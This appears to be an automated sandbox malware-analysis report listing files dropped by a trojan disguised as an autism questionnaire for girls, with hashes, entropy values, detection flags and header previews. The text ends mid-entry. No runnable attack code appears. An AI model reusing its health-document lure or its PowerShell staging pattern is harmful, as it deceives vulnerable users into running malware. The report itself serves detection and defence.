                                                                                            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\nyc-204_2016.pdf
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            File Type:PDF document, version 1.4
                                                                                            Category:dropped
                                                                                            Size (bytes):779052
                                                                                            Entropy (8bit):5.4075171599463925
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:hRL1kjbv1kVFJ+GMnrlqB5a7BEeTPeCBLhXbuLcE84ZXvB:h510E+TnqqXbuLZZXZ
                                                                                            MD5:31710A6E10CC4B0F068E4657B2EE5494
                                                                                            SHA1:15B5087AEE7103682B6DF13D4EDDE5276A94AA0D
                                                                                            SHA-256:69D502A425626A4C84A2A8D58477F32B3F92ADEC0A56E371F5DE1BB1B0E89E04
                                                                                            SHA-512:1BB41C8F1991DA1D6E441EEE815E4B21F93B9C828BDC272829A104470D028066C8D0DDC892A2E7C0DEDCA6779F3073DE17EFC0938261418D2E811987D455A12B
                                                                                            Malicious:false
                                                                                            Preview: %PDF-1.4.%.....1 0 obj.<<./Type/ExtGState./SM 0.001.>>.endobj.2 0 obj.<<./Type/ExtGState./OPM 1./OP true.>>.endobj.3 0 obj.<<./Type/ExtGState./OP false.>>.endobj.4 0 obj.<<./FunctionType 4./Length 14./Range[0 1]./Domain[0 1].>>.stream.{ 1 exch sub }.endstream.endobj.5 0 obj.[/Separation/All/DeviceGray 4 0 R].endobj.6 0 obj.<<./FunctionType 4./Length 179./Range[0 1 0 1 0 1 0 1]./Domain[0 1].>>.stream.{ 0 0 0 0 5 4 roll 0 index 3 -1 roll add 2 1 roll pop dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll }.endstream.endobj.7 0 obj.[/DeviceN[/Black]/DeviceCMYK 6 0 R].endobj.8 0 obj.<<./Length 105988.>>.stream./GS0 gs.0 0 0 0 k.26.561 40.99 420.975 435.946 re.f./GS1 gs.BT./F8 1 Tf.9 0 0 9 31.6653 469.1401 Tm.0 0 0 1 k.[(\t)]TJ.0.45606 0 Td.[<07>228]TJ./F3 1 Tf.1.16197 0 Td.[<19>]TJ.0.66699 0 Td.[(E)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(9)]TJ.0.22217 0 Td.[(>)]TJ.0.55616 0 Td.[(5)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(C)]TJ
                                                                                            C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            Process:C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3156992
                                                                                            Entropy (8bit):6.365159560244291
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:REA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTVQ33387:192bz2Eb6pd7B6bAGx7q333Q
                                                                                            MD5:8693B9CFB8B4C466AE12CCDC2FEB46CE
                                                                                            SHA1:3AF2687BE88754CC17CB3CAAC57331A467F554BB
                                                                                            SHA-256:AF1E952B5B02CA06497E2050BD1CE8D17B9793FDB791473BDAE5D994056CB21F
                                                                                            SHA-512:997AEC8FA4948C301EC4FC5D50DB5AACE33A1D0F73BB0A75B748F1208BE72616290077D9C78228EDE34917B5D7E85B2CF70402969002BB8C131911C5F1D32C87
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                            • Antivirus: ReversingLabs, Detection: 9%
                                                                                            Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,.........`F,......P,...@...........................1...........@......@....................-......p-.29....-.t.....................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc...t.....-.......-.............@..@..............1.......0.............@..@........................................................
                                                                                            C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
                                                                                            File Type:PDF document, version 1.4
                                                                                            Category:dropped
                                                                                            Size (bytes):779052
                                                                                            Entropy (8bit):5.4075171599463925
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:hRL1kjbv1kVFJ+GMnrlqB5a7BEeTPeCBLhXbuLcE84ZXvB:h510E+TnqqXbuLZZXZ
                                                                                            MD5:31710A6E10CC4B0F068E4657B2EE5494
                                                                                            SHA1:15B5087AEE7103682B6DF13D4EDDE5276A94AA0D
                                                                                            SHA-256:69D502A425626A4C84A2A8D58477F32B3F92ADEC0A56E371F5DE1BB1B0E89E04
                                                                                            SHA-512:1BB41C8F1991DA1D6E441EEE815E4B21F93B9C828BDC272829A104470D028066C8D0DDC892A2E7C0DEDCA6779F3073DE17EFC0938261418D2E811987D455A12B
                                                                                            Malicious:false
                                                                                            Preview: %PDF-1.4.%.....1 0 obj.<<./Type/ExtGState./SM 0.001.>>.endobj.2 0 obj.<<./Type/ExtGState./OPM 1./OP true.>>.endobj.3 0 obj.<<./Type/ExtGState./OP false.>>.endobj.4 0 obj.<<./FunctionType 4./Length 14./Range[0 1]./Domain[0 1].>>.stream.{ 1 exch sub }.endstream.endobj.5 0 obj.[/Separation/All/DeviceGray 4 0 R].endobj.6 0 obj.<<./FunctionType 4./Length 179./Range[0 1 0 1 0 1 0 1]./Domain[0 1].>>.stream.{ 0 0 0 0 5 4 roll 0 index 3 -1 roll add 2 1 roll pop dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll dup 1 gt { pop 1 } if 4 1 roll }.endstream.endobj.7 0 obj.[/DeviceN[/Black]/DeviceCMYK 6 0 R].endobj.8 0 obj.<<./Length 105988.>>.stream./GS0 gs.0 0 0 0 k.26.561 40.99 420.975 435.946 re.f./GS1 gs.BT./F8 1 Tf.9 0 0 9 31.6653 469.1401 Tm.0 0 0 1 k.[(\t)]TJ.0.45606 0 Td.[<07>228]TJ./F3 1 Tf.1.16197 0 Td.[<19>]TJ.0.66699 0 Td.[(E)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(9)]TJ.0.22217 0 Td.[(>)]TJ.0.55616 0 Td.[(5)]TJ.0.55616 0 Td.[(C)]TJ.0.5 0 Td.[(C)]TJ
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\AOiWkhKTEUaSxqPJryR.SPWQXkCAMyTmhGzuqt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):186874
                                                                                            Entropy (8bit):7.998991006818741
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:hleGfu0y63FVYQOtahSi6bVjL98Qu1UxDWd635U7Zm/s2X:hAGO63FVYQOkhSi6Zn9pq3D7Zm/s2X
                                                                                            MD5:3A9A0DDB21CF166F1F13186B53EF7ABC
                                                                                            SHA1:D97AE6262669CE00D0A61C8E7FD55466C738A03F
                                                                                            SHA-256:C286307944FEE984B61587353D4D666460932554F7E1F4E830E4742049AD43A8
                                                                                            SHA-512:FC357603F0C42E206FF496CE68FC0857AD7334B3241D04800F23B0B14E9BA0F6017996A5302ED7F7339B2DBBCDE704981B85AB85AFA289E98D460D2691464EE7
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\ASsgpFIMVt.xMedSYgIBHG
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):143239
                                                                                            Entropy (8bit):7.998784497313455
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:CH7i5Y1sZiX1ewEk/wHIvd32nKLS88cn4VCdBXM+0mdWxCECrSj:s7EY1TFewEkooVvSrvVCdBXMbmdeHCy
                                                                                            MD5:8DB35A5A2A8E03C19030ED9DB956B82A
                                                                                            SHA1:A324FA15311CF80A266240B0CE5F4BA279C82B09
                                                                                            SHA-256:FFBA096ACE4703BC6B07BE35DF6F99E942276C3AD5F1CD7782068083958B44E9
                                                                                            SHA-512:C6FE43C2695A576EE489B9E1C4B58C8285EAA5AC784405C2CA9F95AD6AAE3340D936A1DC132DBAF843C8A3EB74631A7207AE3F5D31DE569EA17A9359F0876457
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\BSCWZeibkUap.kNyGvUKVWROLg
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):193427
                                                                                            Entropy (8bit):7.99909925708658
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:IIQ0Al38RISsOk0iaKDrexBAawVkWun+KXviSFh+rVRdEoL4xx5FC:I8E3aSOvwrGBAagun+KX6ShIRa9xx5k
                                                                                            MD5:6AFC814E96BA1188C0B712D079C2B4BA
                                                                                            SHA1:BE02AFA80CF836ADECAA7C02F8F6A3298D425ADF
                                                                                            SHA-256:F642A6A62E8641E5ED8C97515C29AEB6E345DD95E6CD3B9F3C2A8471A4AF9F3E
                                                                                            SHA-512:31648857FB6688179A967C50B7AD99A90D42C6336876828A93094299BBE75A20DB8C88E0B440850C1DFA2A33956C9035C6961B7F47E0E3077C69798BB8C91C69
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\BrWsxmwzXtq.boMtkvBjOGhViaZIu
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):167533
                                                                                            Entropy (8bit):7.998851902202064
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:US9Iv89VeO4ABuEgxZ3zZ93bOBd2BHqR5anEkftQx+Mdtz83j6:V2va8TEg/7A2AR5ADQd83j6
                                                                                            MD5:B2116E5A9772D025678CC8561531133A
                                                                                            SHA1:0340152DC86D5E2794E6F8504C83FD39ECCFE767
                                                                                            SHA-256:83B0BBEE9847812BBE4A1D8600AB6F45DA8681CC3435D038A2C91AF26E977AC6
                                                                                            SHA-512:7F07F645533F8CE81E7800059BE973A6DC94ABECFA0BDE891314B0D147B6141D2B2BE89EBCE15605CFD0DA3EE64F9223F8117EF672A9C5BC3070BE6621068E96
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\BsXTWhuOSKlUJidkM.OFiACTthuEWcHqNsUM
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):130277
                                                                                            Entropy (8bit):7.998575506824406
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:XR0nZQHfVgL6N2PBQwHJKoydrIbfEGo3wWaR6F3MZytJreGScN+jF5:+GdgMMuJ6js3wDsF3mQZ4B5
                                                                                            MD5:CF825DBE962D11615B2D038D00681BF2
                                                                                            SHA1:433892689084BE66CB1AB3B424FA0D194BDE37B3
                                                                                            SHA-256:47DE025CF20651F2D5B626A45E3C6282AF7C55E0937BFCF413FE166DDFA9B570
                                                                                            SHA-512:B8DE6556A73732B7DF3E93697F175A81863FA612E8E5B3BBA5C70A6B38680B3C58F9934E33F59D959BCA940E0FAC9B5B56E0DE80AD2D2B204D72D0EE0692C254
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\DkJrpwuAXeOI.hIMvrwnfOGdyLp
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):180709
                                                                                            Entropy (8bit):7.999001165875362
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:Ojw+NTgxgBqVFPYhbKvwt+pRyziIFi7fQHDEVGnO/HN+IujHnx1AmNvm8iy/Lo:Ojw+hgxgBsFGQcEkij7EDtnyN+7R9YW0
                                                                                            MD5:B049AE57B871FA85A0014D49EC51A926
                                                                                            SHA1:D50952E683436C03B6C2F6FF6F417FBACDB0AD92
                                                                                            SHA-256:9F9B8A814DC7FC5A1FD124088B60ECAB908A72B9AB9F35C621CE1FF806D05A93
                                                                                            SHA-512:E10B9F43E4F5DAA5A8D3E597994E141D55E0EB4E67B3E7A9BF0858B9F5E361CF0CE27A890BEF1AD133549B50D5532B885CEC70400B2CF0B4D84AC0120EE658E2
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\DpZKQEkjnlPFUbgiSc.RVnKibmNahLBUCAOXP
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):134079
                                                                                            Entropy (8bit):7.998508519262818
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:F9j4823Vwyu9YaVMLe4jFHDk8dnZIt9Xv8T31hlx2:nRIwyuzO6uFHDk4ZIcT31hlo
                                                                                            MD5:AA148F739E31E95D2EEEB36C98B46115
                                                                                            SHA1:6BAA994CBE2C5492C3C1533258CE101C20BB0D4F
                                                                                            SHA-256:FB03E5B3B4E2DA4F4307F60C0F9756E637FF4307BBFEEEBBBD85F559B1D68736
                                                                                            SHA-512:DCE09B8C8C7E9E5E09A58E148E65C4039000128EE64FE4A09CC8D31DE3B25CE374555EB1372257B7161139EACB64F072A41C780436C226447BDE5EBD2A2CB889
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\DteYiQCzsmBdLVXjSo.eZRFsEoJXSwgAf
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):123346
                                                                                            Entropy (8bit):7.998269502299577
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:r1s/v5WdPs2jwmE/Ht5c+T/b08rhdJ3p9e2o6vm3+UHVax3y1fUZv58LLhUTGvec:rG/x32jVENfbb0EhX598VZaIFhiubB
                                                                                            MD5:48634A04A5329771DBEE9AD45C6D85CC
                                                                                            SHA1:C02F9FF9ABC314AE9A19A82FF705F7D900A89DE4
                                                                                            SHA-256:7B96F0F7E704D7794F9F13ED5A8D6A3431A086FE536BE8F3279CF077048ECB89
                                                                                            SHA-512:8B1E4D9E565AC427AEDD8EE07D43226AED471EB9CD5DFBD0D63CC803D503B13C87F2BA0C26EC958B8BD251239A5745D9EDF23F334938790F97F3EF50840086E2
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\EIbPfKnJUvZcgtBai.iGKXJZaFmvbpAoVjs
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):141696
                                                                                            Entropy (8bit):7.99876668155372
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:SYzaxh46Rn/T2CSexAkslMNDdM4KCQc/eLFFhAvgXiKEreHCcuYh7n:HW/rR72/fkZBMNc/6AvgXiKErCCctZn
                                                                                            MD5:4CC9748D01730C7681D1D1F0503DC3B7
                                                                                            SHA1:0EE8494EB17F7BED25B9B8E14FE64D5576AFB46B
                                                                                            SHA-256:2730253FB5E2EA500D84D9C9D8A6374A2E8C27DA5A903B0D075618C4223833C7
                                                                                            SHA-512:5E044AB8142804C10B0351116031D95A85A58F52B74D0DF14904057F45E6E35AA414997BF33DD9285AC4A3A65F4D24DCDDEE0876390BA87B66C66C1629C808F2
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\EVZRsKUiwlqh.uShGkIVfog
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):139786
                                                                                            Entropy (8bit):7.998711018635881
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:w2l4RT++FVafJU4Moz1nPgBYsHAVxV5+aaQi0eeMFRBadGg:B6RTsnMoz1nQjy73q3FvaUg
                                                                                            MD5:B7B22E3C9DC72DFC4A44A211DFD5CB91
                                                                                            SHA1:41BA5BB281B645CB139052AFC1615655B3588F08
                                                                                            SHA-256:75DFBCC77AF52AE167F8EB131457E160759EC2EBA93E3D985265C464283F9DD7
                                                                                            SHA-512:7C811AC9F35523AB17528A8E358F7FEE84AF5F39337DB704ADBD1B8FE0B59CD549585DD4B1CD97B69E0EA313AF033982732728CBF4B48E24DF0599A781FA1B26
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\EiRchpfIFtKU.chewIUsPOzbuYQNk
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):186427
                                                                                            Entropy (8bit):7.99890013736535
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:eNkyDw8Il/5zcQwupIHcL8MifmQGFfvrMaDu/yfGje4CwmkT1YWCCNtpwpQ:yDw8Ilxzc2bLrhQGxDDu6fGj1CwJT6W1
                                                                                            MD5:39BE2C7E50C0604F84E7BF19A7ED0071
                                                                                            SHA1:EF4E60C4BE2DF1BE95AA2182FB4ADCDF29038092
                                                                                            SHA-256:0B3F846212FA2F219FCC8CE12A91963A0C7EDAF27B74D046CDE7D9474F3B213E
                                                                                            SHA-512:021D356DCACD38AA78FD62100417479EF316A1BE53D770E4B9B16065501E39FB1C9ECEA8F9C87225485134C291686ED3B23E81F9443DE154AEBE3A8E368CBF28
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\FXsftcBnRmArDTNopIG.nBRdLfvJAjwxHi
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):59109
                                                                                            Entropy (8bit):7.997126391275654
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:EvIORvRRlezezm+CiHe4B1cEM3ePgPZ+J0:Ev9lq8mF4B1cE4ePji
                                                                                            MD5:DB39907FCA2D86160E94F756C7D89852
                                                                                            SHA1:8B8BC67DBDA24F0E2782B036A05ACCEB737F3BBF
                                                                                            SHA-256:88C1864DB942F59FF0A5FB9407FC27EAA42C8564DF1FB5FCF529EFCAABBBC824
                                                                                            SHA-512:C4C21CCEB80EF02BED61E833905DBAA50BD51394B2438D2B780D84AD54E9C9A7E0142C32F96C8C5AB7BC5C459342FD1A83641DDDC1786FDBB2656C59D9605FAD
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\FsWrRkPyOwJoMfluUn.JYVOCsvNtXxpBEU
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):141405
                                                                                            Entropy (8bit):7.998828265086002
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:RoD21eNb6pYS3/FRe5DaqcX7CMojPv2qgy8E9PXC8S:RGXe3Nw5Dajlojn2qgy8OPXC8S
                                                                                            MD5:68693D7486523300F07DE2A07744C9CA
                                                                                            SHA1:016BC50DC61D5E6C40EC53200EA2921EB22A8091
                                                                                            SHA-256:731A31E1005266E004CD4F26E6EED6AC5C1C54DBC9AB37027B449766DB8F1409
                                                                                            SHA-512:CE66D8C324BFCDDE5126787D2F1B42179BCF1CEE8D9E878A86D258B90934707B7F0E00B91BBF82B58293FD753BF348EB696F56C1AC9871997A93F53AC65427B7
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\FvCmpXgloUHxqLBz.jQcUyPWvmAh
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):56004
                                                                                            Entropy (8bit):7.997028439153857
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:19+kcgJqc/dVBQRtiO9fbVrdZkRmrt3sdE/:xnVGLiO9fbVo2tOA
                                                                                            MD5:342708A3D7E5E480B124DBD2EF99CCC2
                                                                                            SHA1:345D9F9D74E7704AAD9A90F10522F7E08D8E87A8
                                                                                            SHA-256:4BB3E2870EF98C0BA124275655A338600D34E95CFB186B1A4D893795D153A88C
                                                                                            SHA-512:298375E8887333FAEA7F671F11A9FC800BEA2F7DB80B62DF37583409686C9E0AD6436E559611C75131CA37A8947EC491E48C547310AB8F16AAF0714A1D97A4C7
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GFNDrRJQMepgqul.keibGwgVIQvusja
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):190873
                                                                                            Entropy (8bit):7.9990202472093275
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:O+9k1tbxVeSmV1Tdq4XPkYsV9loK7X3ngKHvqKHBhAP0k4FFkqH61wrz1:Tk1dIVlRMYsqK7nhHvrAP0k4FH6gR
                                                                                            MD5:C57E3EC1F980E86205F28BDEFAEF3919
                                                                                            SHA1:96A41697F2972D15D48D4F2CF985B1596CED9A83
                                                                                            SHA-256:534AA02A6EC64CA3E05EFD95914C60926A437968036E4868B37C5A795A0D5D43
                                                                                            SHA-512:1200F486AB5DC46E24F520C8A73DA0C41F5C1C30C11E9DF65248C1B2BC855A7C45E6F69B111C17F21DB8BEE2801833E2C37ABD9744E02CA4E5D048D0B21BE5D8
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GcDdpgBqmPQ.muUMBsQZhlLo
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):118387
                                                                                            Entropy (8bit):7.998401157833594
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:sap5Yzf11+0FwJl6xA4jaUYcaJFg2vTtO1Rb9+BDCs:sIE1HC0a7caJ68O119+hb
                                                                                            MD5:5454DF78EC40A7014ACC1A83AD301154
                                                                                            SHA1:573AD30A10F865A735366DF1FC2BFA44862CF2FF
                                                                                            SHA-256:A1BD48DD5D6D0A503316AFB08B79A8C62A99044021ED33E9974A79C0E3431ADF
                                                                                            SHA-512:E7D907D25B0D03C9481785D77D6F42A09DD8DED1D98C0B5B8ED796553DE9880CC8992E16EFB3FAFD223E15495DE7F4C2CE5231FBE7B3DBE3F58B0B2423C53D11
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GdqiwFBQpsDrbZKN.CSNGEXIeZWT
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:SysEx File -
                                                                                            Category:dropped
                                                                                            Size (bytes):70016
                                                                                            Entropy (8bit):7.99776210793591
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:l75abUuGLENsutG1pi/AnkEIwNcW3DEgXENxkNZ7+HgHTE:l7KUyOA4nkEpDTPXENxkaHgzE
                                                                                            MD5:CC72B292E5A0F6C4B12D5437649BB27A
                                                                                            SHA1:DE4A72540840BF8F92C51E08F129B0DC36C20AC8
                                                                                            SHA-256:C75AD5C9C6DEEC85C459EDD4B4E6FCE5996C97F1C73C6B8E32641347FE4451F9
                                                                                            SHA-512:8A61F2F542E02BECD56B651C4935CA77F8548498FEE5A49B1D9352C6CE07A5A6B2B6288790C42B7A7C39AECC090836081225BF745FA75860A1E592D4C75899F4
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GhBlUWJfmbEFNSgOeti.dsHkrSPjKTDoWibhB
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):109771
                                                                                            Entropy (8bit):7.998432692623651
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:jRdd+7bRcP67v+SmZLe0Yll5jnV5gM7o6sxyUPYp:tn+7bK/S8yX/V5RTsu
                                                                                            MD5:C99160FC282132887C4AA2D45CD866C5
                                                                                            SHA1:4429596001FBEB6DE427EB382BE4617641E971B8
                                                                                            SHA-256:BD7CED80B685391B37769DC75060C4FF01595F032E079021C2B0D8B407BF07FA
                                                                                            SHA-512:38A1C47EEEFAC5945931050BAA518EBF4C5F0E2B16D77D7FFED694BC1844902BD9A0A3EB3AD30686686CBB4EC8B1B51F177DB9219D9AEC6458792F194DC663B6
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\HgscSMKine.GdwrFeoEtaxORb
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):112207
                                                                                            Entropy (8bit):7.9985594438719785
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:bHoOa9/TbOPqJUXJhHjQnnqOF6SbGPB3q/dpMnbnVpSE+YXJYaLmxH9REiICrQ4o:M5RHUXPZOOBs3MnrVph+YXuaqF9P78R
                                                                                            MD5:47C5880EFC7DAC03EE6F5F92BEE7A293
                                                                                            SHA1:D09812366008F84B7D41876CE380CC1425090F06
                                                                                            SHA-256:3A8F5D186DBA82EBA9BD77A9C248B2A07DB5674767C5FBD3CCC271DEE529B4B2
                                                                                            SHA-512:6D2A0C3D35D2C3737DEC6FD97C78F3B086747C2B1DB46A522EC17A74477452ABFB32E17124DC6C9F9727B16E503060F5DE5E227E477A89489DBF22E1CF8378F8
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\HsbVFMRyapmDkzTXI.vsrDUdewyaFKxGj
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):54850
                                                                                            Entropy (8bit):7.996853138512541
                                                                                            Encrypted:true
                                                                                            SSDEEP:768:EhfOCGGEt9c3yzLBHOgIIuBgZ0A1bDXxC/3HbB3/KU+JCu77gSmF4LyplQREBLSY:AJgc3COgmBgG+8bJ0CuvgBOWJSHvL5hQ
                                                                                            MD5:9813CA775C92C7431181CDB278F82123
                                                                                            SHA1:044E4D18E2C6ADC360421677FD0807D81A0B89C7
                                                                                            SHA-256:580EC8265EF0AE26D9E27C3CBCAFEE991027D6470B04BBBA92F060E96AC7DD91
                                                                                            SHA-512:C7D7CBCB047154820BE565366FBD8E812FA94D9317994BCBA3AD105679C059EFA2C78310EEC0123F8CC5B23BE5FCED2C607D5E2170416DF19E9F5F3357220576
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\IwTztFHhQrdRxGpKcUW.tAKIPwaJkSqjgsHbDG
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PGP\011Secret Sub-key -
                                                                                            Category:dropped
                                                                                            Size (bytes):54852
                                                                                            Entropy (8bit):7.996783257988784
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:uJBpNxEBlryfO5SsuWgKMrZWoY4Jf8w0IpHM8ObfpbM9:uJlxEBlryf72gKkkoXJf8w00pObRA9
                                                                                            MD5:BD2EF7EA8962FBEF15B38069504E1151
                                                                                            SHA1:0C54ED2B1D016DA78A6D6EAEDE7F2008E6767CEE
                                                                                            SHA-256:802D5B982DB2AB640F860D741DA4512F237A63940956489A43221C83A54344D9
                                                                                            SHA-512:FEE2AD3999EAE47BB02864E74B4265E00D3F333BA1886EDBC5A8C2C9D0140246DB3A4C2DC3C6AC222EA9AA56F19AD1712916996E458C565A683A4DBEEB1EC90A
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\JpdPkirxXzA.dUxbTghEqwLZHrPSyOF
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):82623
                                                                                            Entropy (8bit):7.997586869059904
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:vhHyPqGV6v8ePUpSzI0peqz3IAA5qYf21kxp9e2HdHI0FxFBwSoG8cb77:vhHyeDzIgeRUYf21k1HdHJFTBfvbn
                                                                                            MD5:20B019304BCD993069DA1C00A5BC3D4E
                                                                                            SHA1:9971CB13A675C65392580379D4A5C53C22738FFB
                                                                                            SHA-256:CF6BAC50DE0B7BB72D73624F125CEA3C33B4FB3B912CF42B1FC53B46599EFA73
